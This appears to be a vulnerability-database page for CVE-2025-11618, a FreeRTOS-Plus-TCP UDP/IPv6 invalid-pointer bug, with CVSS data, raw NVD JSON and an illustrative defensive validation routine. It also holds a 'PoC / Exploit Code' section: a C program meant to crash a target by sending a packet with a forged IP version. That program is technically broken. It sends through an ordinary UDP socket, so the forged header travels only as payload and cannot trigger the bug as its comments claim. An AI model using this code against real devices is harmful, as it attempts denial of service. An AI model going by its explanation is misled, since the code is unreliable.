Security Vulnerability Report
CVE-2025-11618 CVSS 4.3 MEDIUM

CVE-2025-11618

Published: 2025-10-10 18:15:38
Last Modified: 2025-10-31 18:23:01
Source: ff89ba41-3aa1-4d27-914a-91399e9639e5

Description

A missing validation check in FreeRTOS-Plus-TCP's UDP/IPv6 packet processing code can lead to an invalid pointer dereference when receiving a UDP/IPv6 packet with an incorrect IP version field in the packet header. This issue only affects applications using IPv6. We recommend upgrading to the latest version and ensuring that any forked or derivative code is patched to incorporate the new fixes.
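
The kind of receive-path validation the description says was missing, shown as an added example; it is not FreeRTOS-Plus-TCP's code or its actual fix. The function names, verdict codes and the 66-byte sample frame are constructed for illustration, and IPv6 extension headers are not handled.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical verdict codes for this example. */
enum rx_verdict { RX_OK, RX_TOO_SHORT, RX_NOT_IPV6, RX_BAD_VERSION,
                  RX_NOT_UDP, RX_BAD_LENGTH };

#define ETH_LEN 14u   /* Ethernet header */
#define IP6_LEN 40u   /* fixed IPv6 header */
#define UDP_LEN 8u    /* UDP header */

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Validate a received frame before any code casts it to IPv6/UDP structs. */
enum rx_verdict check_udp6_frame(const uint8_t *f, size_t len)
{
    if (f == NULL || len < ETH_LEN + IP6_LEN + UDP_LEN) return RX_TOO_SHORT;
    if (rd16(f + 12) != 0x86DD) return RX_NOT_IPV6;       /* EtherType */
    const uint8_t *ip6 = f + ETH_LEN;
    /* The version nibble must agree with the EtherType-selected parser. */
    if ((ip6[0] >> 4) != 6) return RX_BAD_VERSION;
    if (ip6[6] != 17) return RX_NOT_UDP;                  /* Next Header */
    size_t payload = rd16(ip6 + 4);
    if (payload < UDP_LEN || payload > len - ETH_LEN - IP6_LEN)
        return RX_BAD_LENGTH;
    size_t udp_len = rd16(ip6 + IP6_LEN + 4);
    if (udp_len < UDP_LEN || udp_len > payload) return RX_BAD_LENGTH;
    return RX_OK;
}

/* Constructed sample: 66-byte frame, 4-byte UDP payload, zeroed addresses. */
enum rx_verdict sample_verdict(uint8_t version, size_t len)
{
    uint8_t f[66];
    memset(f, 0, sizeof f);
    f[12] = 0x86; f[13] = 0xDD;                 /* EtherType IPv6 */
    f[14] = (uint8_t)(version << 4);            /* version nibble under test */
    f[19] = 12;                                 /* IPv6 payload length */
    f[20] = 17;                                 /* Next Header: UDP */
    f[21] = 64;                                 /* Hop Limit */
    f[59] = 12;                                 /* UDP length */
    return check_udp6_frame(f, len <= sizeof f ? len : sizeof f);
}

int main(void)
{
    /* Exit 0 only if the good frame passes and the version-4 frame is dropped. */
    return !(sample_verdict(6, 66) == RX_OK &&
             sample_verdict(4, 66) == RX_BAD_VERSION);
}
```

A frame that fails any check should be dropped and counted before protocol-specific handlers see the buffer.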

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:amazon:freertos-plus-tcp:*:*:*:*:*:*:*:* - VULNERABLE
FreeRTOS-Plus-TCP < V4.3.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
/*
 * CVE-2025-11618 PoC - FreeRTOS-Plus-TCP UDP/IPv6 Invalid Pointer Dereference
 * This PoC demonstrates how to craft a malicious UDP/IPv6 packet with
 * an incorrect IP version field to trigger the vulnerability.
 *
 * Usage: Compile and run against a target running FreeRTOS-Plus-TCP
 * with IPv6 enabled and a UDP service listening.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define TARGET_IP    "::1"  // Target IPv6 address
#define TARGET_PORT  1234   // Target UDP port
#define FAKE_VERSION 4      // Incorrect IP version (should be 6 for IPv6)

int main(int argc, char *argv[])
{
    int sockfd;
    struct sockaddr_in6 target_addr;
    unsigned char packet[128];
    int ret;

    // Create UDP socket
    sockfd = socket(AF_INET6, SOCK_DGRAM, 0);
    if (sockfd < 0) {
        perror("socket creation failed");
        return EXIT_FAILURE;
    }

    // Setup target address structure
    memset(&target_addr, 0, sizeof(target_addr));
    target_addr.sin6_family = AF_INET6;
    target_addr.sin6_port = htons(TARGET_PORT);
    inet_pton(AF_INET6, TARGET_IP, &target_addr.sin6_addr);

    /*
     * Construct a malformed UDP/IPv6 packet:
     * - First byte: Version (4 bits) + Traffic Class (4 bits)
     *   Set Version to 4 instead of 6 to trigger the bug
     * - Rest of the packet mimics IPv6 structure but with wrong version
     */
    memset(packet, 0, sizeof(packet));
    packet[0] = (FAKE_VERSION << 4) | 0x00; // Version=4, Traffic Class=0
    packet[1] = 0x00;                       // Traffic Class (cont.) + Flow Label
    packet[2] = 0x00;
    packet[3] = 0x00;
    packet[4] = 0x00;                       // Payload Length (high byte)
    packet[5] = 0x20;                       // Payload Length (low byte) = 32
    packet[6] = 0x11;                       // Next Header: UDP (17)
    packet[7] = 64;                         // Hop Limit

    // Source IPv6 address (bytes 8-23)
    for (int i = 8; i < 24; i++) {
        packet[i] = 0xfe;
    }

    // Destination IPv6 address (bytes 24-39)
    for (int i = 24; i < 40; i++) {
        packet[i] = 0xff;
    }

    // UDP header (starts at byte 40)
    packet[40] = 0x04;                       // Source Port (high)
    packet[41] = 0xd2;                       // Source Port (low) = 1234
    packet[42] = (TARGET_PORT >> 8) & 0xFF;  // Dest Port (high)
    packet[43] = TARGET_PORT & 0xFF;         // Dest Port (low)
    packet[44] = 0x00;                       // Length (high)
    packet[45] = 0x20;                       // Length (low) = 32
    packet[46] = 0x00;                       // Checksum (high)
    packet[47] = 0x00;                       // Checksum (low)

    // Payload
    memset(&packet[48], 'A', 32);

    // Send the malicious packet
    ret = sendto(sockfd, packet, sizeof(packet), 0,
                 (struct sockaddr *)&target_addr, sizeof(target_addr));
    if (ret < 0) {
        perror("sendto failed");
        close(sockfd);
        return EXIT_FAILURE;
    }

    printf("Malformed UDP/IPv6 packet sent to [%s]:%d\n", TARGET_IP, TARGET_PORT);
    printf("Packet size: %d bytes\n", ret);
    printf("IP Version field: %d (should be 6 for IPv6)\n", FAKE_VERSION);

    close(sockfd);
    return EXIT_SUCCESS;
}
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11618", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2025-10-10T18:15:38.460", "lastModified": "2025-10-31T18:23:01.413", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A missing validation check in FreeRTOS-Plus-TCP's UDP/IPv6 packet processing code can lead to an invalid pointer dereference when receiving a UDP/IPv6 packet with an incorrect IP version field in the packet header. This issue only affects applications using IPv6.\n\nWe recommend upgrading to the latest version and ensure any forked or derivative code is patched to incorporate the new fixes."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:amazon:freertos-plus-tcp:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.3.4", "matchCriteriaId": "89B35827-054F-4712-A2AB-FB26C87C9C56"}]}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/AWS-2025-023/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/FreeRTOS/FreeRTOS-Plus-TCP/releases/tag/V4.3.4", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Release Notes"]}, {"url": "https://github.com/FreeRTOS/FreeRTOS-Plus-TCP/security/advisories/GHSA-6fh9-mqxj-hmwj", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Vendor Advisory"]}]}}